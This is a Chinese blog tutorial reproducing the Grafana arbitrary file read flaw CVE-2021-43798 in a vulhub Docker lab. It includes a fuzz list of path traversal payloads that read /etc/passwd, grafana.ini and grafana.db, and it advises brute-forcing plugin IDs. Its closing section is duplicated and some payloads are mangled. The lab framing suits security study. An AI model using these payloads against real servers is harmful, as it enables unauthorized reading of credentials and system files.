您现在的位置是:首页 > 正文

Grafana任意文件读取 (CVE-2021-43798)

2024-02-01 04:45:25阅读 5

Grafana任意文件读取 (CVE-2021-43798)

一、漏洞介绍

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件

二、漏洞影响版本

Grafana 8.0.0 - 8.3.0

三、漏洞环境

进入 vulhub/grafana/CVE-2021-43798

启动漏洞环境: docker-compose up -d

在这里插入图片描述

开启环境,端口为3000 访问一下 看到登陆界面

在这里插入图片描述

四、漏洞复现

漏洞利用 Fuzz字典

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwds
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
远程读取数据库信息
/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db

可以在burp中 intruder模块爆破一下,看看 Grafana 存在哪些插件

可以造成信息读取

在这里插入图片描述

读取Grafana配置文件

/public/plugins/alertGroups/…/…/…/…/…/…/…/…/etc/grafana/grafana.ini

在这里插入图片描述

读取Grafana数据库

/public/plugins/alertGroups/…/…/…/…/…/…/…/…/var/lib/grafana/grafana.

在这里插入图片描述

alertGroups alertlist canvas是插件ID,Grafana默认安装的就有。也可以改成别的插件ID,可以自己在fuzz字典里尝试

五、关闭环境

docker-compose down

ps alertlist canvas是插件ID,Grafana默认安装的就有。也可以改成别的插件ID,可以自己在fuzz字典里尝试

五、关闭环境

docker-compose down

在这里插入图片描述

网站文章

  • dubbox在异构系统中的使用-补充1

    除了添加必要的dependencies外,其他需要设置的文件包括:1. web.xml,加载dubbox dispatch servlet:<?xml version="1.0&quo...

    2024-02-01 04:45:19
  • Android 8.0 App Standby

    一、概述低电耗模式和应用待机模式是从Android M引入的新特性,之前一直没有分析,低电耗模式就是Doze,应用待机模式就是 App Standby。Doze模式我们之前分析过了,Doze模式在Android N又有修改,Android 6.0(API 级别 23)引入了低电耗模式,当用户设备未插接电源、处于静止状态且屏幕关闭时,该模式会推迟 CPU 和网络活动,从而延长电池寿命。而 A...

    2024-02-01 04:45:01
  • 维宏控制卡win7 驱动_雕刻机专用维宏5.55运动驱动控制卡

    详情介绍雕刻机维宏控制卡电脑雕刻机控制系统功能特点: 1.全中文windows界面,图形三维显示,操作简捷; 2.pci总线插卡结构,pci 2.1标准,windows 2000/nt/98兼容; 3...

    2024-02-01 04:44:52
  • Vue3 计算属性

    Vue3 计算属性

    上一篇博文说了 vue3 项目的 toRefs 函数和 toRef 函数,今天就稍微总结一下 vue3 的计算属性,其实学过 vue2 的宝子们应该都清楚,计算属性这个东西在项目开发过程中使用的还是比...

    2024-02-01 04:44:25
  • Spring data elasticsearch简单上手 | ES-7版本,springboot 2.4

    本来觉得写这个没什么意义,感觉看看别人就够了,然鹅,,,,被网上的坑的很惨再次强调本文的环境:2021年1月23日01:51:43的最新配置spring boot 2.4版本Elasticsearch...

    2024-02-01 04:44:18
  • Typora 开始收费,改用好玩的MarkText

    Typora 开始收费,改用好玩的MarkText

    收费……可以考虑使用:MarkText简述MarkTextMarkText 这个工具侧重于“命令”,导航栏都被收起来了。有些小伙伴感觉反而不好用,其实不然,是未了解该工具的强大之处。md 文本本身就是...

    2024-02-01 04:44:12
  • jsp中base标签的两种使用方法

    方法一 <% String basePath = request.getScheme() + "://" + request.getServerName() + "...

    2024-02-01 04:43:41
  • Cython入门到放弃(一) 热门推荐

    无意中发现了一个巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,而且非常风趣幽默,像看小说一样!觉得太牛了,所以分享给大家。教程链接:https://www.cbedai.net/qtlyx python作为一门强大的脚本语言,优势自然不必说,目前中低频的量化投资基本都是使用python作为research和production作为语...

    2024-02-01 04:43:33
  • dubbo微服务架构中传递MuitipartFile的问题及解决方式

    在编程的过程中总会遇到各式各样的问题,只有遇到的多了,总结的多了,我们才会有提升,在未来的道路上走的更远。

    2024-02-01 04:43:26
  • python处理命令行参数

    python处理命令行参数

    导航:起始页 > Dive Into Python > 脚本和流 > 处理命令行参数 >> 深入 Python :Dive Into Python 中文版 Python 从新手到专家 [Dip_5.4b_CPyUG_Release] Find: 10.6. 处理命令行参数 Python

    2024-02-01 04:42:55